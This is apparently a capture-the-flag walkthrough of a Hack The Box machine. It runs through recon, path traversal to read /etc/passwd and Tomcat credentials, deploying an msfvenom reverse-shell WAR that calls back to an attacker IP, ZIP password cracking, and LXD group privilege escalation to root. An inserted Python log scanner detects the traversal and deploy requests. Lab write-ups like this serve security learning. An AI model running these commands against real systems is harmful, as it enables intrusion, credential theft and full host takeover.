Service overview

$ nmapAutomator.sh -H 10.10.10.194 -t Full

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA)
|   256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA)
|_  256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

$ gobuster dir -u http://10.10.10.194 -w /usr/share/dirb/wordlists/common.txt -x php,txt,pdf,jsp,jspx
/assets               (Status: 301) [Size: 313] [--> http://10.10.10.194/assets/]
/favicon.ico          (Status: 200) [Size: 766]
/files                (Status: 301) [Size: 312] [--> http://10.10.10.194/files/]
/index.php            (Status: 200) [Size: 14175]
/news.php             (Status: 200) [Size: 0]
/Readme.txt           (Status: 200) [Size: 1574]
/server-status        (Status: 403) [Size: 277]
$ gobuster dir -u http://10.10.10.194/files/ -w /usr/share/dirb/wordlists/common.txt -x php,txt,pdf,jsp,jspx
/archive              (Status: 301) [Size: 320] [--> http://10.10.10.194/files/archive/]
/statement            (Status: 200) [Size: 6507]

Let's look at the source of the page http://10.10.10.194/files/statement:

<li><a href="http://megahosting.htb/news.php?file=statement">News</a></li>

Path Traversal

=> http://10.10.10.194/news.php?file=../../../../../../../../../../../etc/passwd
=> http://10.10.10.194:8080/manager/html
here we find a reference to conf/tomcat-users.xml
=> /usr/share/tomcat9

Let's find an example of the tomcat9 package's file layout: https://archlinux.org/packages/extra/any/tomcat9/files/:

etc/
etc/tomcat9/
etc/tomcat9/Catalina/
etc/tomcat9/catalina.policy
etc/tomcat9/catalina.properties
etc/tomcat9/context.xml
etc/tomcat9/jaspic-providers.xml
etc/tomcat9/jaspic-providers.xsd
etc/tomcat9/logging.properties
etc/tomcat9/server.xml
etc/tomcat9/tomcat-users.xml
etc/tomcat9/tomcat-users.xsd
etc/tomcat9/web.xml

=>

curl http://10.10.10.194/news.php?file=../../../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml

=> tomcat $3cureP4s5w0rd123!

https://tomcat.apache.org/tomcat-9.0-doc/host-manager-howto.html

$ USERNAME=tomcat
$ PASSWORD=\$3cureP4s5w0rd123!
$ curl -u ${USERNAME}:${PASSWORD} http://10.10.10.194:8080/manager/text/list
/:running:0:ROOT
/examples:running:9:/usr/share/tomcat9-examples/examples
/host-manager:running:1:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs

Reverse Shell

=> deploy a WAR following the instructions

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f war > shell.war
curl -u ${USERNAME}:${PASSWORD} -T shell.war http://10.10.10.194:8080/manager/text/deploy?path=/shell
nc -lnvp 1234

Navigate to http://10.10.10.194:8080/shell.
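As an added defender-side example (not part of the original writeup), the following Python scans constructed access-log lines for the two request patterns seen above: `..` traversal in the `file` parameter of news.php (including percent-encoded forms) and WAR deployment through the Tomcat manager's text interface. The log lines, timestamps and client IP are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in combined format (not taken from the original page).
SAMPLE_LOG = """\
10.10.14.6 - - [20/Jun/2020:10:01:02 +0000] "GET /news.php?file=statement HTTP/1.1" 200 6507
10.10.14.6 - - [20/Jun/2020:10:01:15 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 1900
10.10.14.6 - - [20/Jun/2020:10:01:40 +0000] "GET /news.php?file=..%252f..%252fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 2200
10.10.14.6 - - [20/Jun/2020:10:05:03 +0000] "PUT /manager/text/deploy?path=/shell HTTP/1.1" 200 60
10.10.14.6 - - [20/Jun/2020:10:05:20 +0000] "GET /shell/ HTTP/1.1" 200 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# File names whose appearance in a query value is suspicious on its own.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "tomcat-users.xml")


def normalize(value: str) -> str:
    """Percent-decode until stable (catches %252f double encoding) and unify slashes."""
    prev = None
    while prev != value:
        prev, value = value, unquote(value)
    return value.replace("\\", "/")


def analyze_line(line: str):
    """Return a list of (ip, kind, detail, status) findings, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, status = m["method"], int(m["status"])
    parts = urlsplit(m["target"])
    findings = []
    for key, raw in parse_qsl(parts.query, keep_blank_values=True):
        val = normalize(raw)
        # A '..' path segment or a well-known sensitive file in any parameter value.
        if ".." in val.split("/") or any(s in val for s in SENSITIVE):
            findings.append(("path_traversal", f"{key}={val}"))
    # Any write-style or deploy request against the Tomcat manager application.
    if parts.path.startswith("/manager/") and (method in ("PUT", "POST") or "/deploy" in parts.path):
        findings.append(("manager_deploy", f"{method} {parts.path}"))
    return [(m["ip"], kind, detail, status) for kind, detail in findings]


def scan(log: str):
    return [f for line in log.splitlines() for f in (analyze_line(line) or [])]


if __name__ == "__main__":
    for ip, kind, detail, status in scan(SAMPLE_LOG):
        print(f"{ip} {kind:15} {status} {detail}")
```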

Brute force

mkdir /tmp/backup
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -v -u 16162020_backup.zip
admin@it
unzip 16162020_backup.zip

User flag

$ su - ash
admin@it
ash@tabby:~$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:b9:4c:4b brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.194/24 brd 10.10.10.255 scope global ens192
       valid_lft forever preferred_lft forever
ash@tabby:~$ cat user.txt
3e7b3f425d48de61a69c59c306929362

Linenum

=> we find that the user is a member of the lxd group
We will use method 2 from https://book.hacktricks.xyz/linux-unix/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation

On the local machine:

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a x86_64

On the remote machine:

lxc image import ./alpine*.tar.gz --alias myimage # (in home dir) 
lxd init
lxc init myimage mycontainer -c security.privileged=true
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
lxc start mycontainer
lxc exec mycontainer /bin/sh

Root flag

$ cd /mnt/root/root/
/mnt/root/root # ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
4: eth0@if5: <BROADCAST,MULTICAST,UP,LOWER_UP,M-DOWN> mtu 1500 qdisc noqueue state UP qlen 1000
    link/ether 00:16:3e:24:6b:49 brd ff:ff:ff:ff:ff:ff
    inet 10.216.71.233/24 brd 10.216.71.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fd42:c3f4:ad23:528c:216:3eff:fe24:6b49/64 scope global dynamic
       valid_lft 3554sec preferred_lft 3554sec
    inet6 fe80::216:3eff:fe24:6b49/64 scope link
       valid_lft forever preferred_lft forever
/mnt/root/root # cat root.txt
f893ff2d9bad98c92df7938ffe007bc6